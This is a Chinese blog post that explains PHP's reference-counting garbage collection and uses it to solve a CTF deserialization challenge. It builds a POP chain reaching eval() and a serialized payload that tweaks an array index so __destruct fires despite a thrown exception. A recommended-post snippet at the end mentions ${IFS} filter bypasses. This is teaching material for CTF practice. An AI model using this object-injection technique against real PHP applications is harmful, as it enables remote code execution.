对PHP GC垃圾回收机制理解及应用

已于 2024-08-13 21:14:38 修改
阅读量221 收藏 3
点赞数 7
文章标签: php web安全
于 2024-08-13 21:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79211256/article/details/141173703
版权

先列出一道例题

<?php 
highlight_file(__FILE__); 
error_reporting(0); 
class aa{ 
    public $num; 
    public function __destruct(){ 
        echo $this->num."hello __destruct"; 
        } 
    }
class bb{ 
    public $string; 
    public function __toString() { 
        echo "hello __toString"; 
        $this->string->flag(); 
        } 
    }
class cc{ 
    public $cmd; 
    public function flag(){ 
        echo "hello __flag()"; 
        eval($this->cmd); 
    } 
}
$a=unserialize($_GET['code']); 
throw new Exception("Garbage collection"); 
?>

题目很简单 关键阻碍是最后丢出的异常

在ctf题目中会出现诸如此类的题目,在代码的结尾抛出了异常,对象不能被正常销毁,导致不能触发destruct魔术方法,此时我们就要想到绕过该抛出的异常,并触发destruct魔术方法,这里就要说到php中的GC(Garbage Collection)

GC

什么是GC

Gc,全称Garbage collection,即垃圾回收机制。

PHP中的GC

在PHP中,使用引用计数回收周期来自动管理内存对象的,当一个变量被设置为NULL,或者没有任何指针指向时,它就会被变成垃圾,被GC机制自动回收掉
那么这里的话我们就可以理解为,当一个对象没有被引用时,就会被GC机制回收,在回收的过程中,它会自动触发_destruct方法,而这也就是我们绕过抛出异常的关键点。

上文说到PHP是使用引用计数来进行管理的,接下来简单说一下。

引用计数

这里看一下php手册的解释

PHP 变量存储在称为“zval”的容器中。zval 容器除了变量的类型和值之外,还包含两个额外的信息位。第一个是“is_ref”,是布尔值,表示变量是否是“引用集合”的一部分。第二个是“refcount”,表示有多少个变量名(也称为符号)指向这个 zval 容器。

第一个字节名为is_ref,是bool值,它用来标识这个变量是否是属于引用集合。PHP引擎通过这个字节来区分普通变量和引用变量,由于PHP允许用户使用&来使用自定义引用,zval变量容器中还有一个内部引用计数机制,来优化内存使用。

第二个字节是refcount,它用来表示指向zval变量容器的变量个数。所有的符号存储在一个符号表中,其中每个符号都有作用域。

看接下来的这个例子

<?php
$a = "new string"; 
xdebug_debug_zval('a'); //用于查看变量a的zval变量容器的内容
?>

我们可以看到这里定义了一个变量$a,生成了类型为String和值为new string的变量容器,而对于两个额外的字节,is_refrefcount,我们这里可以看到是不存在引用的,所以is_ref的值应该是false,而refcount是表示变量个数的,那么这里就应该是1,接下来我们验证一下

(refcount=1, is_ref=0)='new string'

接下来我们添加一个引用

<?php
<?php
$a="new string"; 
$b =&$a;
xdebug_debug_zval('a');
?>

结果如下

(refcount=2, is_ref=1)='new string'

接下来说一下容器的销毁这个事。
变量容器在refcount变成0时就被销毁。它这个值是如何减少的呢,当函数执行结束或者对变量调用了unset()函数,refcount就会减1。
看个例子

<?php
$a="new string"; 
$b =&$a;
$c =&$b;
xdebug_debug_zval('a');
unset($b,$c);
xdebug_debug_zval('a');
?>

按照刚刚所说,那么这里的首次输出的is_ref应该是truerefcount为3。
第二次输出的is_ref值是什么呢,我们可以看到引用$a的变量$b$c都被unset了,所以这里的is_ref应该是false,也是因为unset,这里的refcount应该从3变成了1,接下来验证一下

(refcount=3, is_ref=1)='new string'
(refcount=1, is_ref=0)='new string'

总结:触发GC 从而触发__destruct魔术方法的有两种方法

1.被unset()处理

2.数组对象为null

下面解决开头的那道例题

先放pop链

<?php 

class aa{ 
    public $num; 
    }
class bb{ 
    public $string; 
    }
class cc{ 
    public $cmd; 
}
$a = new aa();
$a -> num = new bb();
$a -> num -> string = new cc();
$a -> num -> string -> cmd = "phpinfo();";
$b = array($a,0);
echo serialize($b);
?>

对象为null时 也可触发__destruct魔术方法

因此先将其放入数组中 之后再将对象置为空

得到

a:2:{i:0;O:2:"aa":1:{s:3:"num";O:2:"bb":1:{s:6:"string";O:2:"cc":1:{s:3:"cmd";s:10:"phpinfo();";}}}i:1;i:0;}

将 i:1 改为 1:0 从而将对象置空

最终payload:

a:2:{i:0;O:2:"aa":1:{s:3:"num";O:2:"bb":1:{s:6:"string";O:2:"cc":1:{s:3:"cmd";s:10:"phpinfo();";}}}i:0;i:0;}

以上部分参考了网上师傅的内容,菜菜勿喷

ve1yy
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java如何关闭gc,GC垃圾回收机制
weixin_31857991的博客
03-21 2316
GC垃圾回收机制,个人理解:因为在使用JAVA创建一个类或者对象后,难免会存在以后不使用的情况,为了减少其继续再占用内存,必须建立一套清理垃圾的机制,但是怎么判断什么样的才算是不使用的垃圾呢,这里面进行了判断并标记分类,然后根据不同的标记再进行不同的处理。不过世事无完美之说,其也是存在弊端的(开销通常很大,而且它的运行具有不确定性),为了避免,我们还是在正常工作中,养成一个好的编程习惯。详情参照h...
HP-socket 扩展 Session 包含GC垃圾回收机制-易语言
06-11
本篇文章将深入探讨“HP-socket 扩展 Session 包含GC垃圾回收机制”这一易语言实现的Session管理方案。 首先,我们要理解“HP-socket扩展”。HP(Happy Programming)可能是开发者自定义的一个框架或库,这里的...
golang GC垃圾回收机制
qq_35679620的博客
08-03 735
** golang GC垃圾回收 ** 垃圾回收(Garbage Collection,简称GC)是编程语言中提供的自动的内存管理机制,自动释放不需要的对象,让出存储器资源,无需程序员手动执行。 Golang中的垃圾回收主要应用三色标记法,GC过程和其他用户goroutine可并发运行,但需要一定时间的STW(stop the world),STW的过程中,CPU不执行用户代码,全部用于垃圾回收,这个过程的影响很大,Golang进行了多次的迭代优化来解决这个问题。 一、Go 历史各个版本在 GC 方面的改进
java垃圾回收机制 内存消耗_GC垃圾回收机制详解
weixin_33901449的博客
02-25 367
个人理解:因为在使用JAVA创建一个类或者对象后,难免会存在以后不使用的情况,为了减少其继续再占用内存,必须建立一套清理垃圾的机制,但是怎么判断什么样的才算是不使用的垃圾呢,这里面进行了判断并标记分类,然后根据不同的标记再进行不同的处理。不过世事无完美之说,其也是存在弊端的(开销通常很大,而且它的运行具有不确定性),为了避免,我们还是在正常工作中,养成一个好的编程习惯。一、JAVA内存区域:在Ja...
PHP新的垃圾回收机制:Zend GC详解
Again yy
05-10 275
概述 在5.2及更早版本的PHP中,没有专门的垃圾回收器GC(Garbage Collection),引擎在判断一个变量空间是否能够被释放的时候是依据这个变量的zval的refcount的值,如果refcount为0,那么变量的空间可以被释放,否则就不释放,这是一种非常简单的GC实现。然而在这种简单的GC实现方案中,出现了意想不到的变量内存泄漏情况(Bug:http://bugs.php...
图文详解JVM中的垃圾回收机制GC
Biteht的博客
06-29 2866
在早期的计算机语言,比如 C 和 C++,需要开发者手动的来跟踪内存,这种机制的优点是。但是它也有它的缺点,新的编程语言,比如 JAVA,Go,Python,PHP… 现在市面上的大部分主流编程语言,都采取了一个方案,那就是 “垃圾回收机制”,运行时自身会运行相应的垃圾回收机制。。垃圾回收器(GC)会在适当的时候将的内存给释放掉。GC的优点:GC的缺点:JVM的内存结构包括四大区域:1.程序计数器 2.栈 (虚拟机栈,本地方法栈)3.堆 4.方法区举个例子,任何组织里,人都有三个派别,1.积极派 2.消极派
python口述垃圾回收机制_理解Python垃圾回收机制
weixin_39553156的博客
03-02 82
def func(c,d):print 'in func function', sys.getrefcount(c) - 1print 'init', sys.getrefcount(11) - 1a = 11print 'after a=11', sys.getrefcount(11) - 1b = aprint 'after b=1', sys.getrefcount(11) - 1func(...
详谈PHP垃圾回收机制
Again yy
05-10 178
引用计数基本知识 每个php变量存在一个叫"zval"的变量容器中。一个zval变量容器,除了包含变量的类型和值,还包括两个字节的额外信息。第一个是"is_ref",是个bool值,用来标识这个变量是否是属于引用集合(reference set)。通过这个字节,php引擎才能把普通变量和引用变量区分开来,由于php允许用户通过使用&来使用自定义引用,zval变量容器中还有一个内部引用计数...
php 垃圾回收周期,PHP 垃圾回收机制
weixin_36397372的博客
04-10 182
PHP垃圾回收说到底是对变量及其所关联内存对象的操作,所以在讨论PHP垃圾回收机制之前,先简要介绍PHP中变量及其内存对象的内部表示(其C源代码中的表示)。PHP官方文档中将PHP中的变量划分为两类:标量类型和复杂类型。标量类型包括布尔型、整型、浮点型和字符串;复杂类型包括数组、对象和资源;还有一个NULL比较特殊,它不划分为任何类型,而是单独成为一类。PHP5.2中使用的内存回收算法是大名鼎鼎...
php垃圾回收机制,[翻译] PHP 垃圾回收机制
weixin_31200621的博客
03-18 58
之所以做这个翻译,是因为官网的中文文档和英文原始文档有些不一致,另外,把英文翻译过来看,好像可以有更好地理解。若发现错误,请随时指出。若有建议,请随时提出。感谢支持!引用计数器的基本概念PHP 变量是存放于一个叫做 "zval" 的容器中。zval 容器包含了变量的类型和值以及附加的两位 (bit) 信息。第一个叫做 "is_ref" 是个 bool 值,表示变量是否为 "reference se...
PHP SESSION机制的理解与实例
10-17
这种方式下,session_start()函数是启动SESSION的关键,它可能会触发垃圾回收机制,用于清理已过期的SESSION文件。垃圾回收的概率可以通过php.ini中的session.gc_probability和session.gc_divisor进行配置。例如,...
php中session过期时间设置及session回收机制介绍
12-18
总结起来,通过理解并适当配置PHP的session过期时间和回收机制,可以有效管理用户会话,平衡用户体验与服务器资源的利用。在实际应用中,根据业务需求调整相关设置,以实现最佳的session管理策略。
理解PHP中的Session及对Session有效期的控制
10-22
如果在这段时间内用户没有发送新的请求,Session会被视为过期,PHP垃圾回收机制会清理这些不再使用的Session数据。然而,用户关闭浏览器并不一定会立即结束会话,因为Session ID通常存储在Cookie中,除非用户手动...
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 481
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
LNMP环境搭建论坛
qq_63652578的博客
08-07 1003
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 298
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
PHP图书借阅微信小程序系统源码
最新发布
2401_84414018的博客
08-12 130
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 1056
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值